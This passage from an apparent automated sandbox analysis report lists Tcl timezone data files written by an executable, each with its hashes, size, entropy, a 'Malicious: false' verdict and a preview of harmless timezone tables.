SSDEEP:	96:GkiB8UWKgXyDodb9WNSpK3vfK8z/pCdnoyCD72xeflcIQiq8DHYa:Gkcarb9WNSpKfCiksT
MD5:	96DEAD7ADC8EB64376A1604ECA5BD8AE
SHA1:	C15F61DD880FE1AC220ED3C2B036EC602B291ADA
SHA-256:	8F3AF27F88D5A5B9F21379AE8E80C5D9D4FC99C7442D9E2270E793D37E03ECEE
SHA-512:	8A0C9738B8B9CEC25773BC8F5537306EC2C55BD876F25BA6CA37910691E9A79A46888E2CA97DC14C24D5C4FB14D1C10D30E38D40E58EF6540FA5C85061C7E9AB
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Currie) {. {-9223372036854775808 34528 0 LMT}. {-2345794528 36000 0 EST}. {-1680508800 39600 1 EST}. {-1669892400 39600 0 EST}. {-1665392400 36000 0 EST}. {-883641600 39600 1 EST}. {-876128400 36000 0 EST}. {-860400000 39600 1 EST}. {-844678800 36000 0 EST}. {-828345600 39600 1 EST}. {-813229200 36000 0 EST}. {47138400 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {89136000 39600 1 EST}. {100022400 36000 0 EST}. {120585600 39600 1 EST}. {131472000 36000 0 EST}. {152035200 39600 1 EST}. {162921600 36000 0 EST}. {183484800 39600 1 EST}. {194976000 36000 0 EST}. {215539200 39600 1 EST}. {226425600 36000 0 EST}. {246988800 39600 1 EST}. {257875200 36000 0 EST}. {278438400 39600 1 EST}. {289324800 36000 0 EST}. {309888000 39600 1 EST}. {320774400 36000 0 EST}. {341337600 39600 1 EST}. {352224000 36000 0 EST}. {3

C:\Users\user\Desktop\tcl\tzdata\Australia\Darwin Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	412
Entropy (8bit):	4.412182162574068
Encrypted:	false
SSDEEP:	6:SlSWB9X52DCnm2OHPPZUjv02UvVdNcmEcaa9Otvcm9v9tVvcm9vB9pvcm9ubin:MBp52umdHPPZUjc2EV9vM7nFIbi
MD5:	2BDA160D8E23A7CC5D3CDF0232AE9302
SHA1:	9824C861053913E4631F1CE07ED7EAB623EA2ABF
SHA-256:	40E3B8281C5526E972ADE068DD082BE13FC14737E532D719FEE51EDA777BA50E
SHA-512:	23D5205BF415857700DDCD82754296AABEFAB93F2DB0FD3D046CC7169AFC938D26AF48D58EC038DEE60796B65B83F747A95053A3E085F6EC6B21C197EADAC4E4
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Darwin) {. {-9223372036854775808 31400 0 LMT}. {-2364108200 32400 0 CST}. {-2230189200 34200 0 CST}. {-1672565340 37800 1 CST}. {-1665390600 34200 0 CST}. {-883639800 37800 1 CST}. {-876126600 34200 0 CST}. {-860398200 37800 1 CST}. {-844677000 34200 0 CST}. {-828343800 37800 1 CST}. {-813227400 34200 0 CST}.}.

C:\Users\user\Desktop\tcl\tzdata\Australia\Eucla Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	714
Entropy (8bit):	4.233531255977267
Encrypted:	false
SSDEEP:	12:MBp527JmdHvOYPJ949U9bkUY9BuwzUpi9gHVKH95u9p99xkxEH9k5qfBhj9klUu:cQ7JemskxUmuwzsv0vUBi0ZhaUu
MD5:	043DE961FC3E7CF42DE47EB25822181A
SHA1:	0C05603FF5C78FC644A34EBBE975B8A28D0057F8
SHA-256:	BD34E0EC50388A2C7C092C5B2A6F90310C3FCF3734DBC80AF0947C3B64CDD931
SHA-512:	97B8D4B895CC95653D713064ED2477D3A57DD1100C0BC8CD81E14E21161E6BBCFF1970A479C69E33E545F12721E40F9EE17DCFDC776474DC1AFBA392B9A3754F
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Eucla) {. {-9223372036854775808 30928 0 LMT}. {-2337928528 31500 0 CWST}. {-1672562640 35100 1 CWST}. {-1665387900 31500 0 CWST}. {-883637100 35100 1 CWST}. {-876123900 31500 0 CWST}. {-860395500 35100 1 CWST}. {-844674300 31500 0 CWST}. {-836473500 35100 0 CWST}. {152039700 35100 1 CWST}. {162926100 31500 0 CWST}. {436295700 35100 1 CWST}. {447182100 31500 0 CWST}. {690311700 35100 1 CWST}. {699383700 31500 0 CWST}. {1165079700 35100 1 CWST}. {1174756500 31500 0 CWST}. {1193505300 35100 1 CWST}. {1206810900 31500 0 CWST}. {1224954900 35100 1 CWST}. {1238260500 31500 0 CWST}.}.

C:\Users\user\Desktop\tcl\tzdata\Australia\Hobart Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	8049
Entropy (8bit):	3.6471756279058085
Encrypted:	false
SSDEEP:	96:8CsiB8UWKgXyDodb9WNSpK3vfK8z/pCdnoyCD72xeflcIQiq8DHYa:8Cscarb9WNSpKfCiksT
MD5:	49F6270D05867A126F2B252F81F65463
SHA1:	EAAE9712C79FA142978A0F456DA3D24DC1579D84
SHA-256:	35C8A1E33FA041EB6A97ED985455FFB81CABDA00473EE0AA10C1E7443B9509BA
SHA-512:	2E95FD72A1E3C6F6A81E412B6CD3B4D04DB74187CD95D85FF1E4A0D7933156C7136BE16D5F5FA615BE00CEE97F9417C76E771227B800EC0B5DAA995712907E7C
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Hobart) {. {-9223372036854775808 35356 0 LMT}. {-2345795356 36000 0 EST}. {-1680508800 39600 1 EST}. {-1669892400 39600 0 EST}. {-1665392400 36000 0 EST}. {-883641600 39600 1 EST}. {-876128400 36000 0 EST}. {-860400000 39600 1 EST}. {-844678800 36000 0 EST}. {-828345600 39600 1 EST}. {-813229200 36000 0 EST}. {-94730400 36000 0 EST}. {-71136000 39600 1 EST}. {-55411200 36000 0 EST}. {-37267200 39600 1 EST}. {-25776000 36000 0 EST}. {-5817600 39600 1 EST}. {5673600 36000 0 EST}. {25632000 39600 1 EST}. {37728000 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {89136000 39600 1 EST}. {100022400 36000 0 EST}. {120585600 39600 1 EST}. {131472000 36000 0 EST}. {152035200 39600 1 EST}. {162921600 36000 0 EST}. {183484800 39600 1 EST}. {194976000 36000 0 EST}. {215539200 39600 1 EST}. {226425600 36000 0 EST}. {24698

C:\Users\user\Desktop\tcl\tzdata\Australia\LHI Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	194
Entropy (8bit):	4.865814837459796
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3yIoGEowFVAIgjG/L2DCkx/2DCPGT:MBaIMje0QL2a7
MD5:	1221FC8932CA3DCA431304AF660840F0
SHA1:	5E023E37D98EA1321B10D36A79B26DF1A017F9D5
SHA-256:	EB8FDBCFDE9E2A2AA829E784D402966F61A5BF6F2034E0CB06A24FACB5B87874
SHA-512:	EB19FE74DC13456D0F9F1EDC9C444793A4011D3B65ADF6C7E7A405504079EB3A0C27F69DDA662F797FE363948E93833422F5DC3C1891AA7D414B062BE4DD3887
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Lord_Howe)]} {. LoadTimeZoneFile Australia/Lord_Howe.}.set TZData(:Australia/LHI) $TZData(:Australia/Lord_Howe).

C:\Users\user\Desktop\tcl\tzdata\Australia\Lindeman Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	773
Entropy (8bit):	4.103908794545305
Encrypted:	false
SSDEEP:	6:SlSWB9X52DCD2Jm2OHFp5Pn6CIcrWE9/593ZSeE9VerhaYY984B8UpN5Xty/yY1C:MBp52gCmdHVPxCkIr5mGty/yfU85
MD5:	27E062AB8A53A6D9A91DFF5744286EA5
SHA1:	4DCF1439E8774A66418A425FAE96F69BA91FD651
SHA-256:	0586C60A5A8729E70D240638CE79D183127EFBA0B502DA169C97F1D11219055E
SHA-512:	5419BC82EB926FCF7C6D92AAFE7EE40FD584F297ABA2DBFDD5DF596E2F0319853D7F774FB7ADE8FF5A19D3A182031BC6DF44CD61E189CA6D4BDA869D486E6FF1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lindeman) {. {-9223372036854775808 35756 0 LMT}. {-2366790956 36000 0 EST}. {-1672567140 39600 1 EST}. {-1665392400 36000 0 EST}. {-883641600 39600 1 EST}. {-876128400 36000 0 EST}. {-860400000 39600 1 EST}. {-844678800 36000 0 EST}. {-828345600 39600 1 EST}. {-813229200 36000 0 EST}. {31500000 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {625593600 39600 1 EST}. {636480000 36000 0 EST}. {657043200 39600 1 EST}. {667929600 36000 0 EST}. {688492800 39600 1 EST}. {699379200 36000 0 EST}. {709912800 36000 0 EST}. {719942400 39600 1 EST}. {731433600 36000 0 EST}. {751996800 39600 1 EST}. {762883200 36000 0 EST}.}.

C:\Users\user\Desktop\tcl\tzdata\Australia\Lord_Howe Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7250
Entropy (8bit):	3.7975760346697753
Encrypted:	false
SSDEEP:	96:zmFP9HsY9BXabBEMlymb1YH3FborMTYuTIDt3Le5+kp/VWeWqQ0I4wgdL:z6L8xymb1YH1bY4GA
MD5:	32E4C89BD2F34380895680188074DB6E
SHA1:	015E2AEB3B4C073E07F511497F3880F02FB5A0E9
SHA-256:	BD49B7213E61175FD9E10D1A73264B63ABEBCA6236B9105B3AD980967F8C75B8
SHA-512:	B190B3F2E5AA5A1D00776B32D6E3CDBA3CEB137C605573B0F3837C03455E5A659463CB63FE30E94E3DC685F86E416E56FC0CCB003855DF8B3C9A7827E8DD486E
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Lord_Howe) {. {-9223372036854775808 38180 0 LMT}. {-2364114980 36000 0 EST}. {352216800 37800 0 LHST}. {372785400 41400 1 LHST}. {384273000 37800 0 LHST}. {404839800 41400 1 LHST}. {415722600 37800 0 LHST}. {436289400 41400 1 LHST}. {447172200 37800 0 LHST}. {467739000 41400 1 LHST}. {478621800 37800 0 LHST}. {499188600 39600 1 LHST}. {511282800 37800 0 LHST}. {530033400 39600 1 LHST}. {542732400 37800 0 LHST}. {562087800 39600 1 LHST}. {574786800 37800 0 LHST}. {594142200 39600 1 LHST}. {606236400 37800 0 LHST}. {625591800 39600 1 LHST}. {636476400 37800 0 LHST}. {657041400 39600 1 LHST}. {667926000 37800 0 LHST}. {688491000 39600 1 LHST}. {699375600 37800 0 LHST}. {719940600 39600 1 LHST}. {731430000 37800 0 LHST}. {751995000 39600 1 LHST}. {762879600 37800 0 LHST}. {783444600 39600 1 LHST}. {794329200 37800 0 LHST}. {81489

C:\Users\user\Desktop\tcl\tzdata\Australia\Melbourne Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7802
Entropy (8bit):	3.6499304198996323
Encrypted:	false
SSDEEP:	96:s6iB8EWM7yqLdlb9WNSpK3vfK8z/pCdnoyCD72xeflcIQiq8DHYa:s6wzb9WNSpKfCiksT
MD5:	6A5182C785DC33B29363FE96277075F7
SHA1:	EC0C179248A597615AE1CBDD2789CC326CD8FE46
SHA-256:	A68B45E4F92EFF7963AF2F05B05300FA9EAD27BA246D96F9BDFB85C72ADF177B
SHA-512:	39D3F281EFDC9EB63534FED8243ECC455F98F4709CBC0571219D82AB140804AB0DA7837D276EEEAD0D2F425F7730AFB49F552F49AD45D244FD2B1EBD98BCBAD0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Melbourne) {. {-9223372036854775808 34792 0 LMT}. {-2364111592 36000 0 EST}. {-1672567140 39600 1 EST}. {-1665392400 36000 0 EST}. {-883641600 39600 1 EST}. {-876128400 36000 0 EST}. {-860400000 39600 1 EST}. {-844678800 36000 0 EST}. {-828345600 39600 1 EST}. {-813229200 36000 0 EST}. {31500000 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {89136000 39600 1 EST}. {100022400 36000 0 EST}. {120585600 39600 1 EST}. {131472000 36000 0 EST}. {152035200 39600 1 EST}. {162921600 36000 0 EST}. {183484800 39600 1 EST}. {194976000 36000 0 EST}. {215539200 39600 1 EST}. {226425600 36000 0 EST}. {246988800 39600 1 EST}. {257875200 36000 0 EST}. {278438400 39600 1 EST}. {289324800 36000 0 EST}. {309888000 39600 1 EST}. {320774400 36000 0 EST}. {341337600 39600 1 EST}. {352224000 36000 0 EST}. {372787200 39600 1 EST}. {

C:\Users\user\Desktop\tcl\tzdata\Australia\NSW Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.8456659038249
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq/xJjLHVAIgoXjLSt2QWCCjREeQWCCjLu:SlSWB9IZaM3yI9HVAIgmo2DC5eDCyu
MD5:	AE3539C49047BE3F8ABAD1AC670975F1
SHA1:	62CD5C3DB618B9FE5630B197AB3A9729B565CA41
SHA-256:	938A557C069B8E0BE8F52D721119CBA9A694F62CF8A7A11D68FD230CC231E17C
SHA-512:	6F143B50C1EEC1D77F87DD5B0FFCF6625800E247400AA58361748BFEA0626E2CDA9C3FD2A4C269B3218D28FF1FB8533F4F6741F6B2C5E83F9C84A5882C86716B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Sydney)]} {. LoadTimeZoneFile Australia/Sydney.}.set TZData(:Australia/NSW) $TZData(:Australia/Sydney).

C:\Users\user\Desktop\tcl\tzdata\Australia\North Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	187
Entropy (8bit):	4.780732237583773
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq/xJjboFVAIgoXjbhvN2QWCCjsrQWCCjb/:SlSWB9IZaM3yIiFVAIgg2DCZrDCy
MD5:	70EF2A87B4538500CFADB63B62DDCBC6
SHA1:	8D737E6E8D37323D3B41AD419F1CA9B5991E2E99
SHA-256:	59B67F2C7C62C5F9A93767898BA1B51315D2AC271075FAFC1A24313BB673FF27
SHA-512:	E148FC32894A7138D1547910CBD590891120CE5FB533D1348243539C35CE2994DC9F3E7B6A952BF871882C8D6ECA47E13E08AF59AB52A55F790508F2DB9B0EB6
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Darwin)]} {. LoadTimeZoneFile Australia/Darwin.}.set TZData(:Australia/North) $TZData(:Australia/Darwin).

C:\Users\user\Desktop\tcl\tzdata\Australia\Perth Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	694
Entropy (8bit):	4.177059373196708
Encrypted:	false
SSDEEP:	12:MBp52wmdHCBdPmRVzEz15zY7aLY6zLAq4z/5fVMBhg8/fp:cQweCBpkY15zY7aLY+LAq4zWhfHp
MD5:	8F23A7EE354F7B471BD0933F7CEEA235
SHA1:	ABE22FEB55079582B90049D98162BEAFACF6E4F1
SHA-256:	241914F22CA6987D8E7222943206CB6A320393ACD7FEAE3C86C520FE653284F0
SHA-512:	F0BDE3FF27B6D9AAB1628452E8F0CF3FC5198E109B12F965E64FD8E411598F3CE4232E52FDC45763F7E7FDC5A5C6CB0CA5DC7FFF8F3A46609C4600907CECDCB3
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Perth) {. {-9223372036854775808 27804 0 LMT}. {-2337925404 28800 0 WST}. {-1672559940 32400 1 WST}. {-1665385200 28800 0 WST}. {-883634400 32400 1 WST}. {-876121200 28800 0 WST}. {-860392800 32400 1 WST}. {-844671600 28800 0 WST}. {-836470800 32400 0 WST}. {152042400 32400 1 WST}. {162928800 28800 0 WST}. {436298400 32400 1 WST}. {447184800 28800 0 WST}. {690314400 32400 1 WST}. {699386400 28800 0 WST}. {1165082400 32400 1 WST}. {1174759200 28800 0 WST}. {1193508000 32400 1 WST}. {1206813600 28800 0 WST}. {1224957600 32400 1 WST}. {1238263200 28800 0 WST}.}.

C:\Users\user\Desktop\tcl\tzdata\Australia\Queensland Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	198
Entropy (8bit):	4.75392731256171
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3yIaWhvFVAIgPWzCxL2DCoRWJvFBx+DC7W6:MBaIMjoTL2rOvFey
MD5:	D12C6F15F8BFCA19FA402DAE16FC9529
SHA1:	0869E6D11681D74CC3301F4538D98A225BE7C2E1
SHA-256:	77EA0243A11D187C995CE8D83370C6682BC39D2C39809892A48251123FF19A1E
SHA-512:	A98D1AF1FC3E849CCF9E9CC090D3C65B7104C164762F88B6048EA2802F17D635C2E66BE2661338C1DD604B550A267678245DE867451A1412C4C06411A21BE3A9
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Brisbane)]} {. LoadTimeZoneFile Australia/Brisbane.}.set TZData(:Australia/Queensland) $TZData(:Australia/Brisbane).

C:\Users\user\Desktop\tcl\tzdata\Australia\South Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	193
Entropy (8bit):	4.701653352722385
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3yIDRpGvFVAIgSRFL2DCa7QDCuRpv:MBaIMjdp5YFL23QHpv
MD5:	23671880AC24D35F231E2FCECC1A5E3A
SHA1:	5EE2EFD5ADE268B5114EB02FDA77F4C5F507F3CB
SHA-256:	9823032FFEB0BFCE50B6261A848FE0C07267E0846E9F7487AE812CEECB286446
SHA-512:	E303C7DE927E7BAA10EE072D5308FEE6C4E9B2D69DDD8EF014ED60574E0855EE803FE19A7CB31587E62CAE894C087D47A91A130213A24FCCD152736D82F55AB1
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Adelaide)]} {. LoadTimeZoneFile Australia/Adelaide.}.set TZData(:Australia/South) $TZData(:Australia/Adelaide).

C:\Users\user\Desktop\tcl\tzdata\Australia\Sydney Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7799
Entropy (8bit):	3.643686327072466
Encrypted:	false
SSDEEP:	96:GZNiB81WcyqLdlb9WNSpK3vfK8z/pCdnoyCD72xeflcIQiq8DHYa:GZNJzb9WNSpKfCiksT
MD5:	85A3172865D08EC4794B26FE81A74335
SHA1:	A4AFE77CDDFA14FB8AAD6FEE8E6366C44D36884B
SHA-256:	034A480E29B7C313C3F3D2D7B29657FF2B4935E126E55FAAE8EB122AFB6EB8CD
SHA-512:	346FDB50E9AF053794F9B0DC4B2EEF87D71E89A748B9936B77AFB372538A94A7B66C922A4658246C1738A999C5567DB8CD1BE21AEE1301AB732D1D610F704D22
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit..set TZData(:Australia/Sydney) {. {-9223372036854775808 36292 0 LMT}. {-2364113092 36000 0 EST}. {-1672567140 39600 1 EST}. {-1665392400 36000 0 EST}. {-883641600 39600 1 EST}. {-876128400 36000 0 EST}. {-860400000 39600 1 EST}. {-844678800 36000 0 EST}. {-828345600 39600 1 EST}. {-813229200 36000 0 EST}. {31500000 36000 0 EST}. {57686400 39600 1 EST}. {67968000 36000 0 EST}. {89136000 39600 1 EST}. {100022400 36000 0 EST}. {120585600 39600 1 EST}. {131472000 36000 0 EST}. {152035200 39600 1 EST}. {162921600 36000 0 EST}. {183484800 39600 1 EST}. {194976000 36000 0 EST}. {215539200 39600 1 EST}. {226425600 36000 0 EST}. {246988800 39600 1 EST}. {257875200 36000 0 EST}. {278438400 39600 1 EST}. {289324800 36000 0 EST}. {309888000 39600 1 EST}. {320774400 36000 0 EST}. {341337600 39600 1 EST}. {352224000 36000 0 EST}. {372787200 39600 1 EST}. {386

C:\Users\user\Desktop\tcl\tzdata\Australia\Tasmania Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	190
Entropy (8bit):	4.7264864039237215
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq/xJjKD4YFedVAIgoXjKgVAt2QWCCjiiieQWCCjKDvn:SlSWB9IZaM3yI4DVyVAIgxkAt2DC3ne0
MD5:	C7C9CDC9EC855D2F0C23673FA0BAFFB6
SHA1:	4C79E1C17F418CEE4BE8F638F34201EE843D8E28
SHA-256:	014B3D71CE6BD77AD653047CF185EA03C870D78196A236693D7610FED7F30B6F
SHA-512:	79AE11CE076BFB87C0AAD35E9AF6E760FC592F1D086EB78E6DF88744F502ED4248853A0EAD72ADA8EA9583161925802EE5E46E3AA8CE8CF873852C26B4FDC05B
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Hobart)]} {. LoadTimeZoneFile Australia/Hobart.}.set TZData(:Australia/Tasmania) $TZData(:Australia/Hobart).

C:\Users\user\Desktop\tcl\tzdata\Australia\Victoria Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	199
Entropy (8bit):	4.7697171393457936
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3yIvFfkvFVAIgoFFL2DCzyQDCMFB:MBaIMj9fHaFL2xQzB
MD5:	BD2EA272B8DF472E29B7DD0506287E92
SHA1:	55BF3A3B6398F9FF1DB3A46998A4EFF44F6F325C
SHA-256:	EE35DF8BBCD6A99A5550F67F265044529BD7AF6A83087DD73CA0BE1EE5C8BF51
SHA-512:	82B18D2C9BA7113C2714DC79A87101FFB0C36E5520D61ADEAB8A31AD219E51A6402A6C8A8FD7120A330FE8847FF8F083397A1BF5889B73484FBAA6F99497DE48
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Melbourne)]} {. LoadTimeZoneFile Australia/Melbourne.}.set TZData(:Australia/Victoria) $TZData(:Australia/Melbourne).

C:\Users\user\Desktop\tcl\tzdata\Australia\West Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	183
Entropy (8bit):	4.781808870279912
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyq/xJjXFedVAIgoXjbOAt2QWCCjH0QWCCj5:SlSWB9IZaM3yIYVAIg9At2DC00DCa
MD5:	9E0EF0058DDA86016547F2BFE421DE74
SHA1:	5DB6AEAC6B0A42FEAE28BB1A45679BC235F4E5BF
SHA-256:	FC952BE48F11362981CDC8859F9C634312E5805F2F1513159F25AEFCE664867C
SHA-512:	C60E5A63378F8424CE8D862A575DFE138646D5E88C6A34562A77BEC4B34EA3ED3085424E2130E610197164C7E88805DC6CDE46416EB45DC256F387F632F48CA7
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Perth)]} {. LoadTimeZoneFile Australia/Perth.}.set TZData(:Australia/West) $TZData(:Australia/Perth).

C:\Users\user\Desktop\tcl\tzdata\Australia\Yancowinna Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	207
Entropy (8bit):	4.871861105493913
Encrypted:	false
SSDEEP:	6:SlSWB9IZaM3yIcKCFVAIgJKfF2DCkuM0DC9Kl:MBaIMjcKCQJKt2kVSKl
MD5:	5C3CED24741704A0A7019FA66AC0C0A1
SHA1:	88C7AF3B22ED01ED99784C3FAB4F5112AA4659F3
SHA-256:	71A56C71CC30A46950B1B4D4FBB12CB1CBAA24267F994A0F223AE879F1BB6EEC
SHA-512:	771A7AC5D03DD7099F565D6E926F7B97E8A7BA3795339D3FD78F7C465005B55388D8CC30A62978042C354254E1BA5467D0832C0D29497E33D6EF1DA217528806
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(Australia/Broken_Hill)]} {. LoadTimeZoneFile Australia/Broken_Hill.}.set TZData(:Australia/Yancowinna) $TZData(:Australia/Broken_Hill).

C:\Users\user\Desktop\tcl\tzdata\Brazil\Acre Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	189
Entropy (8bit):	4.84045343046357
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0sMhS4edVAIg20sMhStQ1bNW1h4IAcGEsMhSA:SlSWB9IZaM3y7thtedVAIgpthKQxWh4y
MD5:	DF4D752BEEAF40F081C03B4572E9D858
SHA1:	A83B5E4C3A9EB0CF43263AFF65DB374353F65595
SHA-256:	1B1AD73D3FE403AA1F939F05F613F6A3F39A8BA49543992D836CD6ED14B92F2C
SHA-512:	1F96F1D8AACD6D37AC13295B345E761204DAE6AA1DF4894A11E00857CCB7247FA7BEBD22407EA5D13193E2945EB1F4210E32669069F157F1459B26643A67F445
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Rio_Branco)]} {. LoadTimeZoneFile America/Rio_Branco.}.set TZData(:Brazil/Acre) $TZData(:America/Rio_Branco).

C:\Users\user\Desktop\tcl\tzdata\Brazil\DeNoronha Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	185
Entropy (8bit):	4.826795532956443
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0wKy4oedVAIg20wK+F1bIAJl0IAcGEwKyvn:SlSWB9IZaM3y7/rDdVAIgp/mxIAE90/8
MD5:	86B9E49F604AD5DBC4EC6BA735A513C7
SHA1:	BE3AB32339DF9830D4F445CCF883D79DDBA8708E
SHA-256:	628A9AE97682B98145588E356948996EAE18528E34A1428A6B2765CCAA7A8A1F
SHA-512:	EE312624EC0193C599B2BDBFA57CC4EA7C68890955E0D888149172DF8F2095C553BFBB80BF76C1B8F3232F3A5863A519FF59976BBAEA622C64737890D159AA22
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Noronha)]} {. LoadTimeZoneFile America/Noronha.}.set TZData(:Brazil/DeNoronha) $TZData(:America/Noronha).

C:\Users\user\Desktop\tcl\tzdata\Brazil\East Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	186
Entropy (8bit):	4.9019570219911275
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0tQJXvedVAIg20tQJX1bJHIAcGEtQJXv:SlSWB9IZaM3y7tIGdVAIgptExR90tIv
MD5:	FBF6B9E8B9C93B1B9E484D88EF208F38
SHA1:	44004E19A485B70E003687CB1057B8A2421D1BF0
SHA-256:	C89E831C4A0525C3CEFF17072843386369096C08878A4412FB208EF5D3F156D8
SHA-512:	4E518FC4CED0C756FF45E0EDE72F6503C4B3AE72E785651DE261D3F261D43F914721EFCEAB272398BC145E41827F35D46DE4E022EAF413D95F64E8B3BD752002
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Sao_Paulo)]} {. LoadTimeZoneFile America/Sao_Paulo.}.set TZData(:Brazil/East) $TZData(:America/Sao_Paulo).

C:\Users\user\Desktop\tcl\tzdata\Brazil\West Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	177
Entropy (8bit):	4.853909262702622
Encrypted:	false
SSDEEP:	3:SlEVFRKvJT8QFCZaMuUyqx0znQZFwFVAIg20znQoCxL1bbAWVIAcGEznQb:SlSWB9IZaM3y7zn+wFVAIgpznzCxLxnJ
MD5:	116F0F146B004D476B6B86EC0EE2D54D
SHA1:	1F39A84EF3DFF676A844174D9045BE388D3BA8C0
SHA-256:	F24B9ED1FAFA98CD7807FFFEF4BACA1BCE1655ABD70EB69D46478732FA0DA573
SHA-512:	23BD7EC1B5ADB465A204AAA35024EE917F8D6C3136C4EA973D8B18B586282C4806329CEBE0EDBF9E13D0032063C8082EC0D84A049F1217C856943A4DDC4900D0
Malicious:	false
Preview:	# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Manaus)]} {. LoadTimeZoneFile America/Manaus.}.set TZData(:Brazil/West) $TZData(:America/Manaus).

C:\Users\user\Desktop\tcl\tzdata\CET Download File
Process:	C:\Users\user\Desktop\GZe6EcSTpO.exe
File Type:	Unknown
Category:	dropped
Size (bytes):	7471
Entropy (8bit):	3.710275786382764
Encrypted:	false
SSDEEP:	96:ht6CvDGwdSscRbjOP9/V+H4Mnb4Nkrloy4xBqffZRgKs0AzxAHTdIVaAq0VZQlth:PSTRNH4Mn82rlo6XIZ9ALeBO
MD5:	AE72690EF7063F0B9F640096204E2ECE
SHA1:	4F815B51DA9BCA97DFF71D191B74D0190890F946
SHA-256:	BB2C5E587EE9F9BF85C1D0B6F57197985663D4DFF0FED13233953C1807A1F11C
SHA-512:	F7F0911251BC7191754AF0BA2C455E825BF16EA9202A740DC1E07317B1D74CDAF680E161155CC1BD5E862DCEE2A58101F419D8B5E0E24C4BA7134999D9B55C48
Malicious:	false
